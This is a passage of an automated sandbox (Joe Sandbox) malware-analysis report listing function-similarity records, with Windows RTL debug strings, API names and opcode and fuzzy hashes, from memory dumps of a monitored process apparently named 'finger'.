                                                                                                                                      • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                      • Instruction Fuzzy Hash: A381BF70E056699EDF28CE68E8917FEBFB2BF46310F1C4659D861A73E1C73498408B90
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
• Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                      • String ID: %%%u$[$]:%u
                                                                                                                                      • API String ID: 48624451-2819853543
                                                                                                                                      • Opcode ID: 810ad37823527613846a70bd2efce494c1e38dfedbc6f3129ace13a798720741
                                                                                                                                      • Instruction ID: 7f4b0177f4cd0d25f938584e503ff073763c6081a0dc9152b8df1c1e4e9b449f
                                                                                                                                      • Opcode Fuzzy Hash: 810ad37823527613846a70bd2efce494c1e38dfedbc6f3129ace13a798720741
                                                                                                                                      • Instruction Fuzzy Hash: A121627AE0025DABDB10DF79EC40AEEBBF8FF44650F580526E905E7250E730D9119BA1
                                                                                                                                      Strings
                                                                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 035502BD
                                                                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 035502E7
                                                                                                                                      • RTL: Re-Waiting, xrefs: 0355031E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
• Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                      • API String ID: 0-2474120054
                                                                                                                                      • Opcode ID: 4f6bfe85c853fb1cf04f2ce76904cfe75af8556a7aab8dafa8147f82c618492f
                                                                                                                                      • Instruction ID: dcd422fadc4aac21de8ac8b188eb5bc1beeda511c146d1faf4f6470626b8421c
                                                                                                                                      • Opcode Fuzzy Hash: 4f6bfe85c853fb1cf04f2ce76904cfe75af8556a7aab8dafa8147f82c618492f
                                                                                                                                      • Instruction Fuzzy Hash: A3E1AD346047429FD724CF28E894B2AB7E0BF85314F180A5EF8A58B2F1D775E945CB42
                                                                                                                                      Strings
                                                                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03557B7F
                                                                                                                                      • RTL: Re-Waiting, xrefs: 03557BAC
                                                                                                                                      • RTL: Resource at %p, xrefs: 03557B8E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
• Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                      • API String ID: 0-871070163
                                                                                                                                      • Opcode ID: 530090a2e8c1aacd69f316e24c0ee2fb2b6496cd7bb6763c02320224ba3fcbb5
                                                                                                                                      • Instruction ID: 696c0ba7fcd460485df9b0b46092521c5a41b5ad031a2affd4953921032863f1
                                                                                                                                      • Opcode Fuzzy Hash: 530090a2e8c1aacd69f316e24c0ee2fb2b6496cd7bb6763c02320224ba3fcbb5
                                                                                                                                      • Instruction Fuzzy Hash: DE41E1357007029FD724CE25E850B6AB7E5FF89720F140A1EF85ADB6A0EB71E415CB91
                                                                                                                                      APIs
                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0355728C
                                                                                                                                      Strings
                                                                                                                                      • RTL: Re-Waiting, xrefs: 035572C1
                                                                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03557294
                                                                                                                                      • RTL: Resource at %p, xrefs: 035572A3
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
• Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                      • API String ID: 885266447-605551621
                                                                                                                                      • Opcode ID: 75482c2e22c4eefdd907f141ee08dbcddd0472182c3516912b2515f6aec84de7
                                                                                                                                      • Instruction ID: 0427b3ff34039e4542bf8ecbee46bfe7af3b10548aec078dfb2678d19671dc36
                                                                                                                                      • Opcode Fuzzy Hash: 75482c2e22c4eefdd907f141ee08dbcddd0472182c3516912b2515f6aec84de7
                                                                                                                                      • Instruction Fuzzy Hash: BF41FF35700202ABD720CE25EC41F6AB7A6FF88710F144A1AFC55EB2A0DB61F8528BD1
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
• Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
• API ID: ___swprintf_l
• String ID: %%%u$]:%u
• API String ID: 48624451-3050659472
• Opcode ID: 8bb903806d5cb44cbbef6e5a34c172cd52eaded5ce8456db81e77642639c6396
• Instruction ID: 68b1b35821aa537515b7df974d2cf9ea5f0e881b4815c8e9c8c28497ba8fce62
• Opcode Fuzzy Hash: 8bb903806d5cb44cbbef6e5a34c172cd52eaded5ce8456db81e77642639c6396
• Instruction Fuzzy Hash: 8C316876A0021DAFDF20DE29EC40BEEB7F8FF44610F544956E849E7150EB309A458BA0

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
• Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-
• API String ID: 1302938615-2137968064
• Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
• Instruction ID: 479160b7943a9a18f01f5ea3ac10cf3d6c59a821d126ba910df16e0fd87463bd
• Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
• Instruction Fuzzy Hash: 4491E770E042369BDF24CF69E8816BEBFB5FF4A320F18451AE861E72E1D73099408720

Strings
Memory Dump Source
• Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
• Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
Similarity
• API ID:
• String ID: $$@
• API String ID: 0-1194432280
• Opcode ID: 14b0fbce7b87ee7a8db2c548f0a6ba24f9ef1ae86ff18a47836db5c774286d66
• Instruction ID: c30453f6685592def238ff5d793e85e525ab69bea89de956f47f45cdaaa7425a
• Opcode Fuzzy Hash: 14b0fbce7b87ee7a8db2c548f0a6ba24f9ef1ae86ff18a47836db5c774286d66
• Instruction Fuzzy Hash: C1815975D002699BDB35CB54DC44BEEB7B8BB48700F0445EAE919BB290E7309E85CFA4

Strings
Memory Dump Source
• Source File: 0000000A.00000002.3587836704.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_32e0000_finger.jbxd
Similarity
• API ID:
• String ID: !-ih$h$jwd}$kaly
• API String ID: 0-917893273
• Opcode ID: 827d4f489632d26c2774ea9bdefe9c8f61aa2b998280c1ba9a70b0c05c48b0c5
• Instruction ID: c00ad340a4b6cb3155672bc224c9a9e2177b65a526ffa2f662692b3233ea6d60
• Opcode Fuzzy Hash: 827d4f489632d26c2774ea9bdefe9c8f61aa2b998280c1ba9a70b0c05c48b0c5
• Instruction Fuzzy Hash: ABE06534028B4446CB04AF14840525A7BD5FB88309F84575DE8D9DA291DA75D356874A